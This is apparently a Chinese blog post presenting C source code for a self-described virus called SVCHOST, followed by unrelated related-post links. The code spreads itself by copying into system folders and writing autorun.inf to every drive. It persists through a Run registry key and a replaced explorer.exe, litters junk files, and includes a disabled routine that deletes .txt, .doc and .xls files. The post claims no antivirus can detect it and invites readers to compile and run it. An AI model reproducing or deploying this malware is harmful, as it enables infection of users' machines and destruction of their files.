一段C语言写的病毒代码
本病毒所具有的功能:
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体:
c:/windows/wjview32.com
c:/windows/explorer.exe
c:/windows/system32/dllcache/explorer.exe
c:/windows/system/msmouse.dll
c:/windows/system32/cmdsys.sys
c:/windows/system32/mstsc32.exe
3.病毒体c:/windows/explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在
explorer.exe 前启动
4.修改注册表,在HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows /CurrentVersion/Run
设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)
5. 生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“
资源管理 器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。
6.连锁能力,将病毒体相连,实现相连复制更新
7.使用进程不断调用进 程,使得在任务管理里无法结束病毒进程
8.不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建
9.生成垃圾文件 (DESTORY_感染_任意数字)5个于C盘下
10.附带删除文件函数(为防止危害,本函数默认不执行)
本病毒到目前为止 任何杀毒软件都无法将其查杀
本病毒单机默认使用对机器无害(破坏代码已屏蔽)
提供病毒卸载程序(保存为X.BAT,双击运行即可卸 载):
@echo off
echo SK-CHINA SVCHOST KILLER 2007.6
echo WRITE BY S.K
taskkill /im mstsc32.exe /f
del c:/windows/wjview32.com
del c:/windows/explorer.exe
del c:/windows/system32/dllcache/explorer.exe
del c:/windows/system/msmouse.dll
del c:/windows/system32/cmdsys.sys
del c:/windows/system32/mstsc32.exe
del c:/svchost.com
del c:/autorun.inf
del d:/svchost.com
del d:/autorun.inf
del e:/svchost.com
del e:/autorun.inf
del f:/svchost.com
del f:/autorun.inf
del g:/svchost.com
del g:/autorun.inf
del h:/svchost.com
del h:/autorun.inf
copy c:/windows/system/explorer.exe c:/windows/explorer.exe
copy c:/windows/system/explorer.exe c:/windows/system32/dllcache/explorer.exe
del c:/windows/system/explorer.exe
echo FINISH!
echo 如果本次清除后仍残留有病毒,请再次运行本程序
pause
--------------------------------------------------------------------
核心代码:(全部代码请从附件中下载,请用DEV-CPP运行其中的工程文件,编译后请将结果文件svchost.exe更名为 svchost.com,否则本病毒无法发挥作用,请安心运行实验,恶意代码已屏蔽)
/*
SK-CHINA
SVCHOST virus WRITE BY S.K
Compiler:
DEV-CPP 4.9.9.2
*/
/* SVCHOST.C */
/* SVCHOST.EXE */
/* SVCHOST.COM */
#include<stdio.h> /*标准输入输出*/
#include<string.h> /*字符串操作*/
#include<stdlib.h> /*其它函数*/
#include<process.h> /*进程控制*/
#include<dir.h> /*目录函数*/
#define SVCHOST_NUM 6 /*关键位置病毒复制数量*/
#define RUBBISH_NUM 5 /*垃圾文件数量*/
#define REMOVE_NUM 5 /*删除文件数*/
/*====================================================================*/
/*
文件AUTORUN.INF内容:
1.自动运行SVCHOST.com
2.覆盖默认打开命令,使用病毒体作 为新的打开方式
3.覆盖默认资源管理器命令,使病毒体作为新的命令方式
*/
char *autorun={"[AutoRun]/nopen=/"SVCHOST.com /s/"/nshell//open=打开(&O)
/nshell//open//Command=/"SVCHOST.com /s/"/nshell//explore=资源管理器(&X)
/nshell//explore//Command=/"SVCHOST.com /s/""};
/*=====================================================================*/
/*
添加注册表项:
1.自动运行生成病毒体C:/windows/wjview32.com
*/
char *regadd={"REGEDIT4/n/n
[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]/n/"wjview32
/"=/"C:windowswjview32.com /s/""};
/*=====================================================================*/
/*
函数:复制文件
复制源:infile
目的地:outfile
成功返回0,失败返回1
*/
int copy(char *infile,char *outfile)
{
FILE *input,*output;
char temp;
if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen
(outfile,"wb"))!=NULL))
{
while(!feof(input))
{
fread(&temp,1,1,input);
fwrite(&temp,1,1,output);
}
fclose(input);
fclose(output);
return 0;
}
else return 1;
}
/*=====================================================================*/
/*
函数:通过explorer自动运行
成功返回0,失败返回1,2
*/
int autorun_explorer()
{
FILE *input;
if((input=fopen("c://windows//system//explorer.exe","rb"))!=NULL)
{
fclose(input);
remove("c://windows//$temp$");
remove("c://windows//system32//dllcache//$temp$");
return 1;
}
copy("c://windows//explorer.exe","c://windows//system//explorer.exe");
rename("c://windows//explorer.exe","c://windows//$temp$");
rename("c://windows//system32//dllcache//explorer.exe","c://windows//system32
//dllcache//$temp$");
if(copy("SVCHOST.com","c://windows//explorer.exe")==0 && copy
("SVCHOST.com","c://windows//system32//dllcache//explorer.exe")==0)
return 0;
else
return 2;
}
/*=====================================================================*/
/*
函数:添加注册表项
成功返回0,失败返回1
*/
int add_reg()
{
FILE *output;
if((output=fopen("$$$$$","w"))!=NULL)
{
fprintf(output,regadd);
fclose(output);
spawnl(1,"c://windows//regedit.exe"," /s $$$$$",NULL);
}
}
/*=====================================================================*/
/*
函数:复制病毒 + Autorun.inf自动运行
*/
void copy_virus()
{
int i,k;
FILE *input,*output;
char *files_svchost[SVCHOST_NUM]=
{"svchost.com","c://windows//wjview32.com","c://windows//system//MSMOUSE.DLL","c://windows//syste
m32//cmdsys.sys","c://windows//system32//mstsc32.exe","c://windows//explorer.exe"};
char temp[2][20]={"c://svchost.com","c://autorun.inf"};
for(i=0;i<SVCHOST_NUM;i++)
{
if((input=fopen(files_svchost,"rb"))!=NULL)
{
fclose(input);
for(k=0;k<SVCHOST_NUM;k++)
{
copy(files_svchost,files_svchost[k]);
}
i=SVCHOST_NUM;
}
}
for(i=0;i<SVCHOST_NUM;i++)
{
if((input=fopen(files_svchost,"rb"))!=NULL)
{
fclose(input);
for(k=0;k<24;k++)
{
copy(files_svchost,temp[0]);
if((output=fopen(temp[1],"w"))!=NULL)
{
fprintf(output,"%s",autorun);
fclose(output);
}
temp[0][0]++;
temp[1][0]++;
}
i=SVCHOST_NUM;
}
}
}
/*=====================================================================*/
/*
函数:制造垃圾文件
*/
void make_rubbish()
{
int i;
FILE *output;
srand(0);
for(i=0;i<RUBBISH_NUM;i++)
{
int n;
char s[30];
n=rand();
sprintf(s,"C://DESTORY_感染_%d",n);
if((output=fopen(s,"w"))!=NULL)
{
fprintf(output,"%ld%s",n*n,s);
fclose(output);
}
}
}
/*=====================================================================*/
/*
函数:删除文件
*/
void remove_files()
{
long done;
int i;
struct _finddata_t ffblk;
char *remove_files[3]={"*.txt","*.doc","*.xls"};
for(i=0;i<3;i++)
{
if(_findfirst(remove_files,&ffblk)==-1) continue;
while(!done)
{
remove(ffblk.name);
_findnext(done,&ffblk);
}
_findclose(done);
}
}
/*=====================================================================*/
/*
主程序
使用DEV-CPP 32位C工程 实现.C程序脱离命令行界面,于后台执行
*/
int main(int argc,char **argv)
{
int contral=0;
if(argc>1)
if(strcmp(argv[1],"/s")==0)
goto next1;
autorun_explorer();
spawnl(1,"c://windows//system//explorer.exe",NULL);
next1:
add_reg();
copy_virus();
make_rubbish();
/* remove_files(); */危害最大部分
spawnl(1,"c://windows//system32//mstsc32.exe"," /s",NULL);
return 0;
}
一段C语言写的病毒代码相关推荐
- 用c语言写一个万年历代码
好的,这是一个使用 C 语言编写的万年历代码的示例: #include <stdio.h> #include <time.h>int main() {time_t t = ti ...
- c语言写照明系统的代码,无线LED照明系统设计(ZigBee)的设计与实现(C语言)
无线LED照明系统设计(ZigBee)的设计与实现(C语言)(任务书,外文翻译,毕业论文12000字,程序软件,答辩PPT) 摘 要 本次毕业设计的题目是无线LED照明系统(Zigbee)的设计与实 ...
- 用tcc编译一个c语言写的简单代码hello world
##第一步:安装tcc## tcc下载链接:https://pan.baidu.com/s/16AthknCgn8mKjzb0ew80KA 提取码:4b50 解压后打开,注意自己的安装路径 ##第二步 ...
- 网络安全下用c语言写蠕虫病毒,神经网络在计算机网络安全管理中的应用
摘 要:伴随着改革开放的不断深入和发展,新的世纪,全球进入信息时代,计算机网络平台在人们日常生活中扮演的角色越来越重要,计算机网络能够储存大量的信息资源,不仅给人们的生活带来了极大的便利,而且丰富了人 ...
- [语言编程] exe病毒代码实例
Set objFS *** CreateObject("Scripting.FileSystemObject") Set objFSO *** CreateObject(" ...
- 会写代码的AI开源了!C语言写得比Codex还要好,掌握12种编程语言丨CMU
点击上方"视学算法",选择加"星标"或"置顶" 重磅干货,第一时间送达 萧箫 发自 凹非寺 量子位 | 公众号 QbitAI 比Codex还 ...
- c语言数组冒泡排序程序的解释,c语言指针数组冒泡排序代码
在学习计算机编程的时候,最重要的就是多思考多练习,才能理解其中的原理.算法,下面ITmemo分享一段我学习c语言基础之后写的一段c语言指针数组冒泡排序代码,其实就是从常规代码改为指针方式进行数组排序而 ...
- 用C语言写一个单词本(兼具检索单词和向TXT中写入陌生单词的功能)
最近在背考研单词,做题时总是觉得有些单词很熟悉,但是又想不起来是否背过,就用大一学的C语言写了这个代码.经过本人10天的试用,非常好用,分享给大家. #include<stdio.h> # ...
- 用lisp语言写一段cad提取坐标代码
好的,这是用 Lisp 语言写的一段 CAD 提取坐标的代码.这段代码假设已经有了一个名为 "points" 的列表,其中包含了若干个点的坐标(x, y): (defun extr ...
最新文章
- auuc 评估指标_广告中增益模型理解
- ASP.NET MVC 4中如何为不同的浏览器自适应布局和视图
- 在linux怎样运行java,怎么在linux运行java
- 【Liunx】Linux 文件基本属性
- html中展开的小箭头,HTML5 移动网页应用中的展开式标签(带上下指示箭头)
- 基于python的网易云音乐下载器
- 用Qt自己开发的 数学坐标绘图软件 可用于 论文,报告插图
- Mac双开微信客户端方法
- 中国农业大学计算机研究生专业课,2020年中国农业大学计算机科学与技术考研经验分享...
- #9733;双十一背后的消费心理
- 关于浮动元素,你还在自己计算位置吗?来看看 Floating UI 吧
- 基于MATLAB/Simulink的电力电子电路仿真技术——三相电流滞环跟踪逆变器
- 2021-10-21 centos7+ nginx + uwsgi(包含一个配置上的天坑)
- [Python从零到壹] 十五.文本挖掘之数据预处理、Jieba工具和文本聚类万字详解
- Thinkpad E470重装WIN7系统后,重启进入boot menu的问题
- Latex角度输入(°)
- 股票买到手想卖可以随时都能卖掉吗
- 什么是 Pandas?
- 王浩:哥德尔思想概说
- 短距离无线通讯-ZigBee